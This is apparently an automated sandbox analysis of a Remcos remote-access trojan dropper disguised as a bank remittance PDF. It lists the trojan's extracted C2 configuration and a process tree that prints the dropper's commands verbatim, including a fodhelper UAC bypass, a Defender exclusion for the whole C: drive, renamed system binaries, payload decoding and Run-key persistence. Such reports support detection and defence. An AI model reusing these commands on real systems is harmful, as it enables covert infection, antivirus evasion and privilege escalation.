Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
30/05/2024, 15:10
Static task
static1
Behavioral task
behavioral1
Sample
E-Advice-Outward Remittance AOBFTT29052024866750/E-Advice-Outward Remittance AOBFTT29052024866750_PDF.cmd
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
E-Advice-Outward Remittance AOBFTT29052024866750/E-Advice-Outward Remittance AOBFTT29052024866750_PDF.cmd
Resource
win10v2004-20240508-en
General
-
Target
E-Advice-Outward Remittance AOBFTT29052024866750/E-Advice-Outward Remittance AOBFTT29052024866750_PDF.cmd
-
Size
4.1MB
-
MD5
98c996ae2d016077b557669a2b05d1d2
-
SHA1
41c53fe4013ed0484bb0a43d39110de4de68a6b3
-
SHA256
19b35d6530de006c56d12e3c3caa095846ed3446bce72b90adc9130ad0a9359b
-
SHA512
7addb2bc85126296f3d307f209ea64b084ed2fcb5fbfaa62724fca9a03e49c0fc28f9e874c14e0fd893f4a7a92074f2ba5e90923253011736db84b7f291c9944
-
SSDEEP
49152:fMH/Q/3P21wHyBJFqQ6WebrGkL+gc0GZNPXdgSDA8Sqnk43iMmWH3GWKKa2Wi9WN:d
Malware Config
Extracted
remcos
DodoCrypt
172.208.52.39:5404
172.208.52.39:5403
172.208.52.39:5402
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
ocoo.dat
-
keylog_flag
false
-
keylog_path
%UserProfile%
-
mouse_option
false
-
mutex
oowoasasasasssasa-3C9PXA
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Executes dropped EXE 24 IoCs
pid Process 1856 alpha.exe 2092 alpha.exe 1224 alpha.exe 2376 alpha.exe 2572 kn.exe 2688 alpha.exe 2584 alpha.exe 1100 alpha.exe 2592 alpha.exe 2460 xkn.exe 2052 alpha.exe 1620 ger.exe 2408 alpha.exe 2796 kn.exe 2836 alpha.exe 2752 Ping_c.pif 2472 alpha.exe 1432 alpha.exe 2640 alpha.exe 2664 alpha.exe 2636 alpha.exe 2772 alpha.exe 1644 alpha.exe 2396 alpha.exe -
Loads dropped DLL 13 IoCs
pid Process 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 2376 alpha.exe 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 2592 alpha.exe 2460 xkn.exe 2460 xkn.exe 2052 alpha.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Xfblvivf = "C:\\Users\\Public\\Xfblvivf.url" Ping_c.pif -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
pid Process 2948 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2752 Ping_c.pif -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2460 xkn.exe 2752 Ping_c.pif -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2460 xkn.exe Token: SeDebugPrivilege 2948 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1268 SndVol.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1268 SndVol.exe 1268 SndVol.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2220 wrote to memory of 2244 2220 cmd.exe 29 PID 2220 wrote to memory of 2244 2220 cmd.exe 29 PID 2220 wrote to memory of 2244 2220 cmd.exe 29 PID 2220 wrote to memory of 1856 2220 cmd.exe 30 PID 2220 wrote to memory of 1856 2220 cmd.exe 30 PID 2220 wrote to memory of 1856 2220 cmd.exe 30 PID 2220 wrote to memory of 2092 2220 cmd.exe 31 PID 2220 wrote to memory of 2092 2220 cmd.exe 31 PID 2220 wrote to memory of 2092 2220 cmd.exe 31 PID 2220 wrote to memory of 1224 2220 cmd.exe 32 PID 2220 wrote to memory of 1224 2220 cmd.exe 32 PID 2220 wrote to memory of 1224 2220 cmd.exe 32 PID 1224 wrote to memory of 2112 1224 alpha.exe 33 PID 1224 wrote to memory of 2112 1224 alpha.exe 33 PID 1224 wrote to memory of 2112 1224 alpha.exe 33 PID 2220 wrote to memory of 2376 2220 cmd.exe 34 PID 2220 wrote to memory of 2376 2220 cmd.exe 34 PID 2220 wrote to memory of 2376 2220 cmd.exe 34 PID 2376 wrote to memory of 2572 2376 alpha.exe 35 PID 2376 wrote to memory of 2572 2376 alpha.exe 35 PID 2376 wrote to memory of 2572 2376 alpha.exe 35 PID 2220 wrote to memory of 2688 2220 cmd.exe 36 PID 2220 wrote to memory of 2688 2220 cmd.exe 36 PID 2220 wrote to memory of 2688 2220 cmd.exe 36 PID 2688 wrote to memory of 2708 2688 alpha.exe 37 PID 2688 wrote to memory of 2708 2688 alpha.exe 37 PID 2688 wrote to memory of 2708 2688 alpha.exe 37 PID 2220 wrote to memory of 2584 2220 cmd.exe 38 PID 2220 wrote to memory of 2584 2220 cmd.exe 38 PID 2220 wrote to memory of 2584 2220 cmd.exe 38 PID 2584 wrote to memory of 2560 2584 alpha.exe 39 PID 2584 wrote to memory of 2560 2584 alpha.exe 39 PID 2584 wrote to memory of 2560 2584 alpha.exe 39 PID 2220 wrote to memory of 1100 2220 cmd.exe 40 PID 2220 wrote to memory of 1100 2220 cmd.exe 40 PID 2220 wrote to memory of 1100 2220 cmd.exe 40 PID 1100 wrote to memory of 2548 1100 alpha.exe 41 PID 1100 wrote to memory of 2548 1100 alpha.exe 41 PID 1100 wrote to memory of 2548 1100 alpha.exe 41 PID 2220 wrote to memory of 2592 2220 cmd.exe 42 PID 2220 wrote to memory of 2592 2220 cmd.exe 42 PID 2220 wrote to memory of 2592 2220 cmd.exe 42 PID 2592 wrote to memory of 2460 2592 alpha.exe 43 PID 2592 wrote to memory of 2460 2592 alpha.exe 43 PID 2592 wrote to memory of 2460 2592 alpha.exe 43 PID 2460 wrote to memory of 2052 2460 xkn.exe 44 PID 2460 wrote to memory of 2052 2460 xkn.exe 44 PID 2460 wrote to memory of 2052 2460 xkn.exe 44 PID 2052 wrote to memory of 1620 2052 alpha.exe 45 PID 2052 wrote to memory of 1620 2052 alpha.exe 45 PID 2052 wrote to memory of 1620 2052 alpha.exe 45 PID 2220 wrote to memory of 2408 2220 cmd.exe 46 PID 2220 wrote to memory of 2408 2220 cmd.exe 46 PID 2220 wrote to memory of 2408 2220 cmd.exe 46 PID 2408 wrote to memory of 2796 2408 alpha.exe 47 PID 2408 wrote to memory of 2796 2408 alpha.exe 47 PID 2408 wrote to memory of 2796 2408 alpha.exe 47 PID 2220 wrote to memory of 2836 2220 cmd.exe 48 PID 2220 wrote to memory of 2836 2220 cmd.exe 48 PID 2220 wrote to memory of 2836 2220 cmd.exe 48 PID 2836 wrote to memory of 2948 2836 alpha.exe 49 PID 2836 wrote to memory of 2948 2836 alpha.exe 49 PID 2836 wrote to memory of 2948 2836 alpha.exe 49 PID 2220 wrote to memory of 2752 2220 cmd.exe 51
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\E-Advice-Outward Remittance AOBFTT29052024866750\E-Advice-Outward Remittance AOBFTT29052024866750_PDF.cmd"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:2244
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
PID:1856
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
PID:2092
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2112
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\E-Advice-Outward Remittance AOBFTT29052024866750\E-Advice-Outward Remittance AOBFTT29052024866750_PDF.cmd" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\E-Advice-Outward Remittance AOBFTT29052024866750\E-Advice-Outward Remittance AOBFTT29052024866750_PDF.cmd" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
PID:2572
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵PID:2708
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵PID:2560
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵PID:2548
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
PID:1620
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
PID:2796
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:2752 -
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Xfblvivf.PIF3⤵PID:636
-
-
C:\Windows\SysWOW64\SndVol.exeC:\Windows\System32\SndVol.exe3⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1268
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
PID:2472
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
PID:1432
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
PID:2640
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2664
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2636
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2772
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1644
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2396
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD57c2dbf080fa9234d16e898791a8f3824
SHA1f1e5a54d9adc0cb0a23d29a7aeca2f98cfac388b
SHA256978198f369ade33e82322aa0c1cd25feab9b736a2c0d98603f2c320b6cdcfb2e
SHA5126874d779983cac3aebf996d5db1f8503802017516db5c2afef9555468d5f67cbf4ce24ee619b08edcbed517c0070df9b29a8a63ebfac0a6b6f93a47c5fa66880
-
Filesize
2.8MB
MD5de320bde3074a4f84aa2ead6a2923159
SHA1d55eb26ffd1bbcc8365720e76d77a095d18b1e3b
SHA256dbcac0979d33f9019c6e8b2defd8d9c415a9357f1d2b111657ee9109a3b0a5b3
SHA512c2ce9e8a39b0baaddbc2ad3bfcc1074133dcb207ec05f99e7b10c82be089d92c07578f3e0c0211ecfa235222169685d1615d4b3b699e89d10c524bc048c72e2a
-
Filesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d